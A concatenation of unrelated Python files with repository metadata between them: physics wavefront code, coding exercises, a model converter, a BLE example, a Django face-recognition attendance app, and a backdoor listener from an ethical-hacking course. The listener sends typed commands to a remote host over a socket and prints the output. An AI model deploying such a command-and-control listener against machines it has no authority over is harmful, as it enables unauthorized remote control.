1e5. The result shows a diffraction pattern without replica but with much noise. :param calculate_grid_only: if set, it calculates only the horizontal and vertical profiles, but returns the full image with the other pixels to zero. This is useful when calculating large arrays, so it is set as the default. :return: a new 2D wavefront object with propagated wavefront """ def do_specific_progation(self, wavefront, propagation_distance, parameters, element_index=None): shuffle_interval = self.get_additional_parameter("shuffle_interval",False,parameters,element_index=element_index) calculate_grid_only = self.get_additional_parameter("calculate_grid_only",True,parameters,element_index=element_index) return self.propagate_wavefront(wavefront,propagation_distance,shuffle_interval=shuffle_interval, calculate_grid_only=calculate_grid_only) @classmethod def propagate_wavefront(cls,wavefront,propagation_distance,shuffle_interval=False,calculate_grid_only=True): # # Fresnel-Kirchhoff integral (neglecting inclination factor) # if not calculate_grid_only: # # calculation over the whole detector area # p_x = wavefront.get_coordinate_x() p_y = wavefront.get_coordinate_y() wavelength = wavefront.get_wavelength() amplitude = wavefront.get_complex_amplitude() det_x = p_x.copy() det_y = p_y.copy() p_X = wavefront.get_mesh_x() p_Y = wavefront.get_mesh_y() det_X = p_X det_Y = p_Y amplitude_propagated = numpy.zeros_like(amplitude,dtype='complex') wavenumber = 2 * numpy.pi / wavelength for i in range(det_x.size): for j in range(det_y.size): if not shuffle_interval: rd_x = 0.0 rd_y = 0.0 else: rd_x = (numpy.random.rand(p_x.size,p_y.size)-0.5)*shuffle_interval rd_y = (numpy.random.rand(p_x.size,p_y.size)-0.5)*shuffle_interval r = numpy.sqrt( numpy.power(p_X + rd_x - det_X[i,j],2) + numpy.power(p_Y + rd_y - det_Y[i,j],2) + numpy.power(propagation_distance,2) ) amplitude_propagated[i,j] = (amplitude / r * numpy.exp(1.j * wavenumber * r)).sum() output_wavefront = GenericWavefront2D.initialize_wavefront_from_arrays(det_x,det_y,amplitude_propagated) else: x = wavefront.get_coordinate_x() y = wavefront.get_coordinate_y() X = wavefront.get_mesh_x() Y = wavefront.get_mesh_y() wavenumber = 2 * numpy.pi / wavefront.get_wavelength() amplitude = wavefront.get_complex_amplitude() used_indices = wavefront.get_mask_grid(width_in_pixels=(1,1),number_of_lines=(1,1)) indices_x = wavefront.get_mesh_indices_x() indices_y = wavefront.get_mesh_indices_y() indices_x_flatten = indices_x[numpy.where(used_indices == 1)].flatten() indices_y_flatten = indices_y[numpy.where(used_indices == 1)].flatten() X_flatten = X[numpy.where(used_indices == 1)].flatten() Y_flatten = Y[numpy.where(used_indices == 1)].flatten() complex_amplitude_propagated = amplitude*0 print("propagate_2D_integral: Calculating %d points from a total of %d x %d = %d"%( X_flatten.size,amplitude.shape[0],amplitude.shape[1],amplitude.shape[0]*amplitude.shape[1])) for i in range(X_flatten.size): r = numpy.sqrt( numpy.power(wavefront.get_mesh_x() - X_flatten[i],2) + numpy.power(wavefront.get_mesh_y() - Y_flatten[i],2) + numpy.power(propagation_distance,2) ) complex_amplitude_propagated[int(indices_x_flatten[i]),int(indices_y_flatten[i])] = (amplitude / r * numpy.exp(1.j * wavenumber * r)).sum() output_wavefront = GenericWavefront2D.initialize_wavefront_from_arrays(x_array=x, y_array=y, z_array=complex_amplitude_propagated, wavelength=wavefront.get_wavelength()) # added [email protected] 2018-03-23 to conserve energy - TODO: review method! output_wavefront.rescale_amplitude( numpy.sqrt(wavefront.get_intensity().sum() / output_wavefront.get_intensity().sum())) return output_wavefront
49.977778
156
0.621165
6,344
0.94027
0
0
4,017
0.595376
0
0
1,765
0.261598
bebf0f2b55c9070eb2aa8dd30568a2e408a3e498
842
py
Python
Problems/Study Plans/Dynamic Programming/Dynamic Programming I/07_delete_and_earn.py
andor2718/LeetCode
59874f49085818e6da751f1cc26867b31079d35d
[ "BSD-3-Clause" ]
1
2022-01-17T19:51:15.000Z
2022-01-17T19:51:15.000Z
Problems/Study Plans/Dynamic Programming/Dynamic Programming I/07_delete_and_earn.py
andor2718/LeetCode
59874f49085818e6da751f1cc26867b31079d35d
[ "BSD-3-Clause" ]
null
null
null
Problems/Study Plans/Dynamic Programming/Dynamic Programming I/07_delete_and_earn.py
andor2718/LeetCode
59874f49085818e6da751f1cc26867b31079d35d
[ "BSD-3-Clause" ]
null
null
null
# https://leetcode.com/problems/delete-and-earn/ class Solution: def deleteAndEarn(self, nums: list[int]) -> int: num_profits = dict() for num in nums: num_profits[num] = num_profits.get(num, 0) + num sorted_nums = sorted(num_profits.keys()) second_last_profit = 0 last_profit = num_profits[sorted_nums[0]] for idx in range(1, len(sorted_nums)): profit_with_curr_num = num_profits[sorted_nums[idx]] if sorted_nums[idx - 1] == sorted_nums[idx] - 1: curr_profit = max(last_profit, second_last_profit + profit_with_curr_num) else: curr_profit = last_profit + profit_with_curr_num second_last_profit, last_profit = last_profit, curr_profit return last_profit
42.1
76
0.609264
791
0.93943
0
0
0
0
0
0
48
0.057007
bebf8ceeebe9e29c2c913232279dc6462e901f90
334
py
Python
Desafio051.py
GabrielSanchesRosa/Python
3a129e27e076b2a91af03d68ede50b9c45c50217
[ "MIT" ]
null
null
null
Desafio051.py
GabrielSanchesRosa/Python
3a129e27e076b2a91af03d68ede50b9c45c50217
[ "MIT" ]
null
null
null
Desafio051.py
GabrielSanchesRosa/Python
3a129e27e076b2a91af03d68ede50b9c45c50217
[ "MIT" ]
null
null
null
# Desenvolva um programa que leia o primeiro termo e a razão de uma PA. No final mostre, os 10 primeiros termos dessa prograssão. primeiro = int(input("Primeiro Termo: ")) razao = int(input("Razão: ")) decimo = primeiro + (10 - 1) * razao for c in range(primeiro, decimo + razao, razao): print(f"{c}", end=" -> ") print("Acabou")
33.4
129
0.679641
0
0
0
0
0
0
0
0
179
0.531157
bebfe36afc8a169020e2b3f2d6602873133b4e74
884
py
Python
tiddlyweb/filters/limit.py
tiddlyweb/tiddlyweb
376bcad280e24d2de4d74883dc4d8369abcb2c28
[ "BSD-3-Clause" ]
57
2015-02-01T21:03:34.000Z
2021-12-25T12:02:31.000Z
tiddlyweb/filters/limit.py
tiddlyweb/tiddlyweb
376bcad280e24d2de4d74883dc4d8369abcb2c28
[ "BSD-3-Clause" ]
6
2016-02-05T11:43:32.000Z
2019-09-05T13:38:49.000Z
tiddlyweb/filters/limit.py
tiddlyweb/tiddlyweb
376bcad280e24d2de4d74883dc4d8369abcb2c28
[ "BSD-3-Clause" ]
17
2015-05-12T08:53:23.000Z
2021-12-21T15:56:30.000Z
""" A :py:mod:`filter <tiddlyweb.filters>` type to limit a group of entities using a syntax similar to SQL Limit:: limit=<index>,<count> limit=<count> """ import itertools def limit_parse(count='0'): """ Parse the argument of a ``limit`` :py:mod:`filter <tiddlyweb.filters>` for a count and index argument, return a function which does the limiting. Exceptions while parsing are passed up the stack. """ index = '0' if ',' in count: index, count = count.split(',', 1) index = int(index) count = int(count) def limiter(entities, indexable=False, environ=None): return limit(entities, index=index, count=count) return limiter def limit(entities, count=0, index=0): """ Make a slice of a list of entities based on a count and index. """ return itertools.islice(entities, index, index + count)
23.891892
78
0.64819
0
0
0
0
0
0
0
0
473
0.535068
bec160209ec5f54fda5f5e3628b149076a57302b
7,019
py
Python
pytorch_keras_converter/API.py
sonibla/pytorch_keras_converter
21925b67b6eb3cbbfa8eb6d33f682d57dafd357d
[ "MIT" ]
17
2019-10-01T14:14:18.000Z
2021-04-25T13:32:24.000Z
pytorch_keras_converter/API.py
sonibla/pytorch_keras_converter
21925b67b6eb3cbbfa8eb6d33f682d57dafd357d
[ "MIT" ]
null
null
null
pytorch_keras_converter/API.py
sonibla/pytorch_keras_converter
21925b67b6eb3cbbfa8eb6d33f682d57dafd357d
[ "MIT" ]
2
2019-10-01T14:02:43.000Z
2019-10-01T14:14:19.000Z
""" Simple API to convert models between PyTorch and Keras (Conversions from Keras to PyTorch aren't implemented) """ from . import utility from . import tests from . import io_utils as utils import tensorflow def convert(model, input_shape, weights=True, quiet=True, ignore_tests=False, input_range=None, save=None, filename=None, directory=None): """ Conversion between PyTorch and Keras (Conversions from Keras to PyTorch aren't implemented) Arguments: -model: A Keras or PyTorch model or layer to convert -input_shape: Input shape (list, tuple or int), without batchsize. -weights (bool): Also convert weights. If set to false, only convert model architecture -quiet (bool): If a progress bar and some messages should appear -ignore_tests (bool): If tests should be ignored. If set to True, converted model will still be tested by security. If models are not identical, it will only print a warning. If set to False, and models are not identical, RuntimeWarning will be raised If weights is False, tests are automatically ignored -input_range: Optionnal. A list of 2 elements containing max and min values to give as input to the model when performing the tests. If None, models will be tested on samples from the "standard normal" distribution. -save: If model should be exported to a hdf5 file. -filename: Filename to give to model's hdf5 file. If filename is not None and save is not False, then save will automatically be set to True -directory: Where to save model's hdf5 file. If directory is not None and save is not False, then save will automatically be set to True Raises: -RuntimeWarning: If converted and original model aren't identical, and ignore_tests is False Returns: If model has been exported to a file, it will return the name of the file Else, it returns the converted model """ if (filename is not None or directory is not None) and save is None: save = True if save is None: save = False if weights == False: ignore_tests = True if not quiet: print('\nConversion...') # Converting: newModel = utility.convert(model=utility.LayerRepresentation(model), input_size=input_shape, weights=weights, quiet=quiet) # Actually, newModel is a LayerRepresentation object # Equivalents: torchModel = newModel.equivalent['torch'] kerasModel = newModel.equivalent['keras'] if not quiet: print('Automatically testing converted model reliability...\n') # Checking converted model reliability tested = False try: meanSquaredError = tests.comparison(model1=torchModel, model2=kerasModel, input_shape=input_shape, input_range=input_range, quiet=quiet) tested = True except tensorflow.errors.InvalidArgumentError: print("Warning: tests unavailable!") if tested and meanSquaredError > 0.0001: if ignore_tests: print("Warning: converted and original models aren't identical !\ (mean squared error: {})".format(meanSquaredError)) else: raise RuntimeWarning("Original and converted model do not match !\ \nOn random input data, outputs showed a mean squared error of {} (if should \ be below 1e-10)".format(meanSquaredError)) elif not quiet and tested: print('\n Original and converted models match !\nMean squared err\ or : {}'.format(meanSquaredError)) if save: if not quiet: print('Saving model...') defaultName = 'conversion_{}'.format(newModel.name) if filename is None: filename = defaultName # Formatting filename so that we don't overwrite any existing file file = utils.formatFilename(filename, directory) # Freezing Keras model (trainable = False everywhere) utils.freeze(kerasModel) # Save the entire model kerasModel.save(file + '.h5') if not quiet: print('Done !') return file + '.h5' if not quiet: print('Done !') return kerasModel def convert_and_save(model, input_shape, weights=True, quiet=True, ignore_tests=False, input_range=None, filename=None, directory=None): """ Conversion between PyTorch and Keras, and automatic save (Conversions from Keras to PyTorch aren't implemented) Arguments: -model: A Keras or PyTorch model or layer to convert -input_shape: Input shape (list, tuple or int), without batchsize. -weights (bool): Also convert weights. If set to false, only convert model architecture -quiet (bool): If a progress bar and some messages should appear -ignore_tests (bool): If tests should be ignored. If set to True, converted model will still be tested by security. If models are not identical, it will only print a warning. If set to False, and models are not identical, RuntimeWarning will be raised If weights is False, tests are automatically ignored -input_range: Optionnal. A list of 2 elements containing max and min values to give as input to the model when performing the tests. If None, models will be tested on samples from the "standard normal" distribution. -filename: Filename to give to model's hdf5 file. If filename is not None and save is not False, then save will automatically be set to True -directory: Where to save model's hdf5 file. If directory is not None and save is not False, then save will automatically be set to True Returns: Name of created hdf5 file """ return convert(model=model, input_shape=input_shape, weights=weights, quiet=quiet, ignore_tests=ignore_tests, input_range=input_range, save=True, filename=filename, directory=directory)
33.42381
78
0.581992
0
0
0
0
0
0
0
0
4,288
0.610913
bec1a22fa74c5c4f594a0551d336d70522ed93f7
1,734
py
Python
examples/enable_notifications.py
kjwill/bleak
7e0fdae6c0f6a78713e5984c2840666e0c38c3f3
[ "MIT" ]
null
null
null
examples/enable_notifications.py
kjwill/bleak
7e0fdae6c0f6a78713e5984c2840666e0c38c3f3
[ "MIT" ]
null
null
null
examples/enable_notifications.py
kjwill/bleak
7e0fdae6c0f6a78713e5984c2840666e0c38c3f3
[ "MIT" ]
1
2021-09-15T18:53:58.000Z
2021-09-15T18:53:58.000Z
# -*- coding: utf-8 -*- """ Notifications ------------- Example showing how to add notifications to a characteristic and handle the responses. Updated on 2019-07-03 by hbldh <[email protected]> """ import sys import logging import asyncio import platform from bleak import BleakClient from bleak import _logger as logger CHARACTERISTIC_UUID = "f000aa65-0451-4000-b000-000000000000" # <--- Change to the characteristic you want to enable notifications from. ADDRESS = ( "24:71:89:cc:09:05" # <--- Change to your device's address here if you are using Windows or Linux if platform.system() != "Darwin" else "B9EA5233-37EF-4DD6-87A8-2A875E821C46" # <--- Change to your device's address here if you are using macOS ) if len(sys.argv) == 3: ADDRESS = sys.argv[1] CHARACTERISTIC_UUID = sys.argv[2] def notification_handler(sender, data): """Simple notification handler which prints the data received.""" print("{0}: {1}".format(sender, data)) async def run(address, debug=False): if debug: import sys l = logging.getLogger("asyncio") l.setLevel(logging.DEBUG) h = logging.StreamHandler(sys.stdout) h.setLevel(logging.DEBUG) l.addHandler(h) logger.addHandler(h) async with BleakClient(address) as client: logger.info(f"Connected: {client.is_connected}") await client.start_notify(CHARACTERISTIC_UUID, notification_handler) await asyncio.sleep(5.0) await client.stop_notify(CHARACTERISTIC_UUID) if __name__ == "__main__": import os os.environ["PYTHONASYNCIODEBUG"] = str(1) loop = asyncio.get_event_loop() # loop.set_debug(True) loop.run_until_complete(run(ADDRESS, True))
27.52381
136
0.689158
0
0
0
0
0
0
548
0.316032
695
0.400807
bec22a0f8cc88b9839de8e482052c5fe36989f8a
163
py
Python
pyrules/storages/base.py
miraculixx/pyrules
b10d1d5e74052fa1db93cc9b459ac9057a9eb502
[ "MIT" ]
17
2015-07-20T03:11:04.000Z
2021-05-02T03:34:05.000Z
pyrules/storages/base.py
miraculixx/pyrules
b10d1d5e74052fa1db93cc9b459ac9057a9eb502
[ "MIT" ]
20
2015-04-10T10:11:44.000Z
2020-09-10T03:51:47.000Z
pyrules/storages/base.py
miraculixx/pyrules
b10d1d5e74052fa1db93cc9b459ac9057a9eb502
[ "MIT" ]
8
2017-04-03T10:46:16.000Z
2021-11-20T05:46:02.000Z
class BaseStorage(object): def get_rule(self, name): raise NotImplementedError() def get_ruleset(self, name): raise NotImplementedError()
23.285714
35
0.680982
162
0.993865
0
0
0
0
0
0
0
0
bec28b12230a8be61261eca269a7854ba31ae9da
820
py
Python
src/15 listener_and_backdoor/listener_2.py
raminjafary/ethical-hacking
e76f74f4f23e1d8cb7f433d19871dcf966507dfc
[ "MIT" ]
null
null
null
src/15 listener_and_backdoor/listener_2.py
raminjafary/ethical-hacking
e76f74f4f23e1d8cb7f433d19871dcf966507dfc
[ "MIT" ]
null
null
null
src/15 listener_and_backdoor/listener_2.py
raminjafary/ethical-hacking
e76f74f4f23e1d8cb7f433d19871dcf966507dfc
[ "MIT" ]
null
null
null
#!/usr/bin/python import socket class Listener: def __init__(self,ip,port): listener = socket.socket(socket.AF_INET,socket.SOCK_STREAM) listener.setsockopt(socket.SOL_SOCKET,socket.SO_REUSEADDR,1) #options to reuse sockets #listener.bind(("localhost",1234)) listener.bind((ip,port)) listener.listen(0) print "[+] Waiting for Incoming Connection" #listen for connecion backlog is set to 0 don't need to wory about 0 self.connection,address = listener.accept() print "[+] Got a Connection from " + str(address) def execute_remotely(self,command): self.connection.send(command) return self.connection.recv(1024) def run(self): while True: command = raw_input(">> ") result = self.execute_remotely(command) print result my_listener = Listener("localhost",1234) my_listener.run()
25.625
70
0.734146
725
0.884146
0
0
0
0
0
0
225
0.27439
bec37dd307106b82f4f0bcaf14227eb2f2a4ba93
1,974
py
Python
dialogflow/history2xls.py
ray-hrst/temi-tools
8efb1e1af93a41bd98fe0ee8c1fd6fb44e788341
[ "MIT" ]
1
2020-06-04T19:30:57.000Z
2020-06-04T19:30:57.000Z
dialogflow/history2xls.py
ray-hrst/temi-tools
8efb1e1af93a41bd98fe0ee8c1fd6fb44e788341
[ "MIT" ]
1
2020-01-14T04:16:12.000Z
2020-01-14T04:16:12.000Z
dialogflow/history2xls.py
ray-hrst/temi-tools
8efb1e1af93a41bd98fe0ee8c1fd6fb44e788341
[ "MIT" ]
null
null
null
#!/usr/bin/env python3 # -*- coding: utf-8 -*- """ Convert Dialogflow history to spreadsheet User must manually copy the history from the browser and save this in a text file. This reads the textfile, parses the data, and saves it to a spreadsheet. Example training sample: USER サワディカ Nov 4, 11:19 PM AGENT No matched intent Nov 4, 11:19 PM more_vert """ import argparse import os from simple_report import SimpleReport # constants FIELDS = ["Date", "User", "Agent"] if __name__ == "__main__": # collect arguments PARSER = argparse.ArgumentParser( description=__doc__, formatter_class=argparse.RawDescriptionHelpFormatter ) PARSER.add_argument("filename", help="History text file") ARGS = PARSER.parse_args() # generate report filename, file_extension = os.path.splitext(ARGS.filename) REPORT = SimpleReport(filename, FIELDS) # step each line of history text file with open(ARGS.filename, 'r') as fp: num_lines = sum(1 for line in open(ARGS.filename)) rows = int(num_lines / 7) print("Reading {} lines of text.".format(num_lines)) print("Writing {} rows.".format(rows)) for row in range(1, rows): user_utterance = fp.readline().strip() # USER UTTERANCE date = fp.readline().strip() # DATE agent_intent = fp.readline().strip() # AGENT INTENT date = fp.readline().strip() # DATE _ = fp.readline().strip() # 'more_vert' utterance = user_utterance.split("USER", 1)[1] intent = agent_intent.split("AGENT", 1)[1] if not intent: intent = "Intent found" print("[{}] {} {} {}".format(row, date, utterance, intent)) # add row to report REPORT.add("Date", row, date, date) REPORT.add("User", row, utterance) REPORT.add("Agent", row, intent) REPORT.close()
27.802817
82
0.609422
0
0
0
0
0
0
0
0
693
0.349294
bec393e2a78f7bd8032716c650f164a7178aab68
25,176
py
Python
recognition/views.py
usathe71-u/Attendance-System-Face-Recognition
c73f660a6089e8ca9dd5c473efcf2bc78f13a207
[ "Apache-2.0" ]
3
2021-05-31T21:11:38.000Z
2021-07-22T18:29:47.000Z
recognition/views.py
usathe71-u/Attendance-System-Face-Recognition
c73f660a6089e8ca9dd5c473efcf2bc78f13a207
[ "Apache-2.0" ]
null
null
null
recognition/views.py
usathe71-u/Attendance-System-Face-Recognition
c73f660a6089e8ca9dd5c473efcf2bc78f13a207
[ "Apache-2.0" ]
null
null
null
from django.shortcuts import render,redirect from .forms import usernameForm,DateForm,UsernameAndDateForm, DateForm_2 from django.contrib import messages from django.contrib.auth.models import User import cv2 import dlib import imutils from imutils import face_utils from imutils.video import VideoStream from imutils.face_utils import rect_to_bb from imutils.face_utils import FaceAligner import time from attendance_system_facial_recognition.settings import BASE_DIR import os import face_recognition from face_recognition.face_recognition_cli import image_files_in_folder import pickle from sklearn.preprocessing import LabelEncoder from sklearn.neighbors import KNeighborsClassifier from sklearn.svm import SVC import numpy as np from django.contrib.auth.decorators import login_required import matplotlib as mpl import matplotlib.pyplot as plt from sklearn.manifold import TSNE import datetime from django_pandas.io import read_frame from users.models import Present, Time import seaborn as sns import pandas as pd from django.db.models import Count #import mpld3 import matplotlib.pyplot as plt from pandas.plotting import register_matplotlib_converters from matplotlib import rcParams import math mpl.use('Agg') #utility functions: def username_present(username): if User.objects.filter(username=username).exists(): return True return False def create_dataset(username): id = username if(os.path.exists('face_recognition_data/training_dataset/{}/'.format(id))==False): os.makedirs('face_recognition_data/training_dataset/{}/'.format(id)) directory='face_recognition_data/training_dataset/{}/'.format(id) # Detect face #Loading the HOG face detector and the shape predictpr for allignment print("[INFO] Loading the facial detector") detector = dlib.get_frontal_face_detector() predictor = dlib.shape_predictor('face_recognition_data/shape_predictor_68_face_landmarks.dat') #Add path to the shape predictor ######CHANGE TO RELATIVE PATH LATER fa = FaceAligner(predictor , desiredFaceWidth = 96) #capture images from the webcam and process and detect the face # Initialize the video stream print("[INFO] Initializing Video stream") vs = VideoStream(src=0).start() #time.sleep(2.0) ####CHECK###### # Our identifier # We will put the id here and we will store the id with a face, so that later we can identify whose face it is # Our dataset naming counter sampleNum = 0 # Capturing the faces one by one and detect the faces and showing it on the window while(True): # Capturing the image #vs.read each frame frame = vs.read() #Resize each image frame = imutils.resize(frame ,width = 800) #the returned img is a colored image but for the classifier to work we need a greyscale image #to convert gray_frame = cv2.cvtColor(frame, cv2.COLOR_BGR2GRAY) #To store the faces #This will detect all the images in the current frame, and it will return the coordinates of the faces #Takes in image and some other parameter for accurate result faces = detector(gray_frame,0) #In above 'faces' variable there can be multiple faces so we have to get each and every face and draw a rectangle around it. for face in faces: print("inside for loop") (x,y,w,h) = face_utils.rect_to_bb(face) face_aligned = fa.align(frame,gray_frame,face) # Whenever the program captures the face, we will write that is a folder # Before capturing the face, we need to tell the script whose face it is # For that we will need an identifier, here we call it id # So now we captured a face, we need to write it in a file sampleNum = sampleNum+1 # Saving the image dataset, but only the face part, cropping the rest if face is None: print("face is none") continue cv2.imwrite(directory+'/'+str(sampleNum)+'.jpg' , face_aligned) face_aligned = imutils.resize(face_aligned ,width = 400) #cv2.imshow("Image Captured",face_aligned) # @params the initial point of the rectangle will be x,y and # @params end point will be x+width and y+height # @params along with color of the rectangle # @params thickness of the rectangle cv2.rectangle(frame,(x,y),(x+w,y+h),(0,255,0),1) # Before continuing to the next loop, I want to give it a little pause # waitKey of 100 millisecond cv2.waitKey(50) #Showing the image in another window #Creates a window with window name "Face" and with the image img cv2.imshow("Add Images",frame) #Before closing it we need to give a wait command, otherwise the open cv wont work # @params with the millisecond of delay 1 cv2.waitKey(1) #To get out of the loop if(sampleNum>300): break #Stoping the videostream vs.stop() # destroying all the windows cv2.destroyAllWindows() def predict(face_aligned,svc,threshold=0.7): face_encodings=np.zeros((1,128)) try: x_face_locations=face_recognition.face_locations(face_aligned) faces_encodings=face_recognition.face_encodings(face_aligned,known_face_locations=x_face_locations) if(len(faces_encodings)==0): return ([-1],[0]) except: return ([-1],[0]) prob=svc.predict_proba(faces_encodings) result=np.where(prob[0]==np.amax(prob[0])) if(prob[0][result[0]]<=threshold): return ([-1],prob[0][result[0]]) return (result[0],prob[0][result[0]]) def vizualize_Data(embedded, targets,): X_embedded = TSNE(n_components=2).fit_transform(embedded) for i, t in enumerate(set(targets)): idx = targets == t plt.scatter(X_embedded[idx, 0], X_embedded[idx, 1], label=t) plt.legend(bbox_to_anchor=(1, 1)); rcParams.update({'figure.autolayout': True}) plt.tight_layout() plt.savefig('./recognition/static/recognition/img/training_visualisation.png') plt.close() def update_attendance_in_db_in(present): today=datetime.date.today() time=datetime.datetime.now() for person in present: user=User.objects.get(username=person) try: qs=Present.objects.get(user=user,date=today) except : qs= None if qs is None: if present[person]==True: a=Present(user=user,date=today,present=True) a.save() else: a=Present(user=user,date=today,present=False) a.save() else: if present[person]==True: qs.present=True qs.save(update_fields=['present']) if present[person]==True: a=Time(user=user,date=today,time=time, out=False) a.save() def update_attendance_in_db_out(present): today=datetime.date.today() time=datetime.datetime.now() for person in present: user=User.objects.get(username=person) if present[person]==True: a=Time(user=user,date=today,time=time, out=True) a.save() def check_validity_times(times_all): if(len(times_all)>0): sign=times_all.first().out else: sign=True times_in=times_all.filter(out=False) times_out=times_all.filter(out=True) if(len(times_in)!=len(times_out)): sign=True break_hourss=0 if(sign==True): check=False break_hourss=0 return (check,break_hourss) prev=True prev_time=times_all.first().time for obj in times_all: curr=obj.out if(curr==prev): check=False break_hourss=0 return (check,break_hourss) if(curr==False): curr_time=obj.time to=curr_time ti=prev_time break_time=((to-ti).total_seconds())/3600 break_hourss+=break_time else: prev_time=obj.time prev=curr return (True,break_hourss) def convert_hours_to_hours_mins(hours): h=int(hours) hours-=h m=hours*60 m=math.ceil(m) return str(str(h)+ " hrs " + str(m) + " mins") #used def hours_vs_date_given_employee(present_qs,time_qs,admin=True): register_matplotlib_converters() df_hours=[] df_break_hours=[] qs=present_qs for obj in qs: date=obj.date times_in=time_qs.filter(date=date).filter(out=False).order_by('time') times_out=time_qs.filter(date=date).filter(out=True).order_by('time') times_all=time_qs.filter(date=date).order_by('time') obj.time_in=None obj.time_out=None obj.hours=0 obj.break_hours=0 if (len(times_in)>0): obj.time_in=times_in.first().time if (len(times_out)>0): obj.time_out=times_out.last().time if(obj.time_in is not None and obj.time_out is not None): ti=obj.time_in to=obj.time_out hours=((to-ti).total_seconds())/3600 obj.hours=hours else: obj.hours=0 (check,break_hourss)= check_validity_times(times_all) if check: obj.break_hours=break_hourss else: obj.break_hours=0 df_hours.append(obj.hours) df_break_hours.append(obj.break_hours) obj.hours=convert_hours_to_hours_mins(obj.hours) obj.break_hours=convert_hours_to_hours_mins(obj.break_hours) df = read_frame(qs) df["hours"]=df_hours df["break_hours"]=df_break_hours print(df) sns.barplot(data=df,x='date',y='hours') plt.xticks(rotation='vertical') rcParams.update({'figure.autolayout': True}) plt.tight_layout() if(admin): plt.savefig('./recognition/static/recognition/img/attendance_graphs/hours_vs_date/1.png') plt.close() else: plt.savefig('./recognition/static/recognition/img/attendance_graphs/employee_login/1.png') plt.close() return qs #used def hours_vs_employee_given_date(present_qs,time_qs): register_matplotlib_converters() df_hours=[] df_break_hours=[] df_username=[] qs=present_qs for obj in qs: user=obj.user times_in=time_qs.filter(user=user).filter(out=False) times_out=time_qs.filter(user=user).filter(out=True) times_all=time_qs.filter(user=user) obj.time_in=None obj.time_out=None obj.hours=0 obj.hours=0 if (len(times_in)>0): obj.time_in=times_in.first().time if (len(times_out)>0): obj.time_out=times_out.last().time if(obj.time_in is not None and obj.time_out is not None): ti=obj.time_in to=obj.time_out hours=((to-ti).total_seconds())/3600 obj.hours=hours else: obj.hours=0 (check,break_hourss)= check_validity_times(times_all) if check: obj.break_hours=break_hourss else: obj.break_hours=0 df_hours.append(obj.hours) df_username.append(user.username) df_break_hours.append(obj.break_hours) obj.hours=convert_hours_to_hours_mins(obj.hours) obj.break_hours=convert_hours_to_hours_mins(obj.break_hours) df = read_frame(qs) df['hours']=df_hours df['username']=df_username df["break_hours"]=df_break_hours sns.barplot(data=df,x='username',y='hours') plt.xticks(rotation='vertical') rcParams.update({'figure.autolayout': True}) plt.tight_layout() plt.savefig('./recognition/static/recognition/img/attendance_graphs/hours_vs_employee/1.png') plt.close() return qs def total_number_employees(): qs=User.objects.all() return (len(qs) -1) # -1 to account for admin def employees_present_today(): today=datetime.date.today() qs=Present.objects.filter(date=today).filter(present=True) return len(qs) #used def this_week_emp_count_vs_date(): today=datetime.date.today() some_day_last_week=today-datetime.timedelta(days=7) monday_of_last_week=some_day_last_week- datetime.timedelta(days=(some_day_last_week.isocalendar()[2] - 1)) monday_of_this_week = monday_of_last_week + datetime.timedelta(days=7) qs=Present.objects.filter(date__gte=monday_of_this_week).filter(date__lte=today) str_dates=[] emp_count=[] str_dates_all=[] emp_cnt_all=[] cnt=0 for obj in qs: date=obj.date str_dates.append(str(date)) qs=Present.objects.filter(date=date).filter(present=True) emp_count.append(len(qs)) while(cnt<5): date=str(monday_of_this_week+datetime.timedelta(days=cnt)) cnt+=1 str_dates_all.append(date) if(str_dates.count(date))>0: idx=str_dates.index(date) emp_cnt_all.append(emp_count[idx]) else: emp_cnt_all.append(0) df=pd.DataFrame() df["date"]=str_dates_all df["Number of employees"]=emp_cnt_all sns.lineplot(data=df,x='date',y='Number of employees') plt.savefig('./recognition/static/recognition/img/attendance_graphs/this_week/1.png') plt.close() #used def last_week_emp_count_vs_date(): today=datetime.date.today() some_day_last_week=today-datetime.timedelta(days=7) monday_of_last_week=some_day_last_week- datetime.timedelta(days=(some_day_last_week.isocalendar()[2] - 1)) monday_of_this_week = monday_of_last_week + datetime.timedelta(days=7) qs=Present.objects.filter(date__gte=monday_of_last_week).filter(date__lt=monday_of_this_week) str_dates=[] emp_count=[] str_dates_all=[] emp_cnt_all=[] cnt=0 for obj in qs: date=obj.date str_dates.append(str(date)) qs=Present.objects.filter(date=date).filter(present=True) emp_count.append(len(qs)) while(cnt<5): date=str(monday_of_last_week+datetime.timedelta(days=cnt)) cnt+=1 str_dates_all.append(date) if(str_dates.count(date))>0: idx=str_dates.index(date) emp_cnt_all.append(emp_count[idx]) else: emp_cnt_all.append(0) df=pd.DataFrame() df["date"]=str_dates_all df["emp_count"]=emp_cnt_all sns.lineplot(data=df,x='date',y='emp_count') plt.savefig('./recognition/static/recognition/img/attendance_graphs/last_week/1.png') plt.close() # Create your views here. def home(request): return render(request, 'recognition/home.html') @login_required def dashboard(request): if(request.user.username=='admin'): print("admin") return render(request, 'recognition/admin_dashboard.html') else: print("not admin") return render(request,'recognition/employee_dashboard.html') @login_required def add_photos(request): if request.user.username!='admin': return redirect('not-authorised') if request.method=='POST': form=usernameForm(request.POST) data = request.POST.copy() username=data.get('username') if username_present(username): create_dataset(username) messages.success(request, f'Dataset Created') return redirect('add-photos') else: messages.warning(request, f'No such username found. Please register employee first.') return redirect('dashboard') else: form=usernameForm() return render(request,'recognition/add_photos.html', {'form' : form}) def mark_your_attendance(request): detector = dlib.get_frontal_face_detector() predictor = dlib.shape_predictor('face_recognition_data/shape_predictor_68_face_landmarks.dat') #Add path to the shape predictor ######CHANGE TO RELATIVE PATH LATER svc_save_path="face_recognition_data/svc.sav" with open(svc_save_path, 'rb') as f: svc = pickle.load(f) fa = FaceAligner(predictor , desiredFaceWidth = 96) encoder=LabelEncoder() encoder.classes_ = np.load('face_recognition_data/classes.npy') faces_encodings = np.zeros((1,128)) no_of_faces = len(svc.predict_proba(faces_encodings)[0]) count = dict() present = dict() log_time = dict() start = dict() for i in range(no_of_faces): count[encoder.inverse_transform([i])[0]] = 0 present[encoder.inverse_transform([i])[0]] = False vs = VideoStream(src=0).start() sampleNum = 0 while(True): frame = vs.read() frame = imutils.resize(frame ,width = 800) gray_frame = cv2.cvtColor(frame, cv2.COLOR_BGR2GRAY) faces = detector(gray_frame,0) for face in faces: print("INFO : inside for loop") (x,y,w,h) = face_utils.rect_to_bb(face) face_aligned = fa.align(frame,gray_frame,face) cv2.rectangle(frame,(x,y),(x+w,y+h),(0,255,0),1) (pred,prob)=predict(face_aligned,svc) if(pred!=[-1]): person_name=encoder.inverse_transform(np.ravel([pred]))[0] pred=person_name if count[pred] == 0: start[pred] = time.time() count[pred] = count.get(pred,0) + 1 if count[pred] == 4 and 